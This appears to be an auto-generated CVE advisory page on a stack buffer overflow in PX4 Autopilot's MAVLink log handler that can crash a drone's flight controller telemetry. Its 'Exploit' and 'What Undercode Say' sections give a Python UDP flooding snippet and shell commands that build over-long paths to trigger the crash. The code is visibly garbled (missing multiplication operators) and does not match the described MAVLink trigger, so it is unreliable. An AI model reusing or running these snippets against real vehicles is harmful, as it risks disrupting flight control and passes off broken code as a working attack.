PX4 Autopilot, Stack-based Buffer Overflow, CVE-2026-32743 (Medium) -DC-Oct2026-2793

Listen to this Post

CVE-2026-32743 is a stack-based buffer overflow vulnerability affecting PX4 Autopilot, an open-source autopilot stack for drones and unmanned vehicles. Versions 1.17.0-rc2 and below are vulnerable through the MavlinkLogHandler, triggered via MAVLink log request. The LogEntry.filepath buffer is 60 bytes, but the sscanf function parses paths from the log list file with no width specifier, allowing a path longer than 60 characters to overflow the buffer. An attacker with MAVLink link access can trigger this by first creating deeply nested directories via MAVLink FTP, then requesting the log list. The flight controller MAVLink task crashes, losing telemetry and command capability and causing DoS. This issue has been fixed in commit 616b25a280e229c24d5cf12a03dbf248df89c474.

DailyCVE Form:

Platform: PX4 Autopilot
Version: 1.17.0-rc2
Vulnerability: Stack overflow
Severity: Medium
date: 2026-03-18

Prediction: 2026-04-15

What Undercode Say:

curl -s https://rdintel.com/cve/CVE-2026-32743 | grep -A5 "LogEntry.filepath"
git clone https://github.com/PX4/PX4-Autopilot.git
git checkout 616b25a280e229c24d5cf12a03dbf248df89c474
import socket
def exploit_mavlink(target_ip, target_port):
payload = b"A" 100
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (target_ip, target_port))

Exploit: (Educational Purposes!)

mkdir -p /tmp/mavlink_logs/$(python3 -c "print('A'100)")
mavlink-ftp put /tmp/mavlink_logs/$(python3 -c "print('A'100)") /fs/microsd/log/
mavlink-request-log-list

Protection: from this CVE

Upgrade to PX4 Autopilot version 1.17.0 or later. Restrict MAVLink link access to trusted operators only. Disable MAVLink FTP if not required. Apply the fix commit 616b25a280e229c24d5cf12a03dbf248df89c474.

Impact:

Denial of service. Loss of telemetry and command capability. Flight controller MAVLink task crashes.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top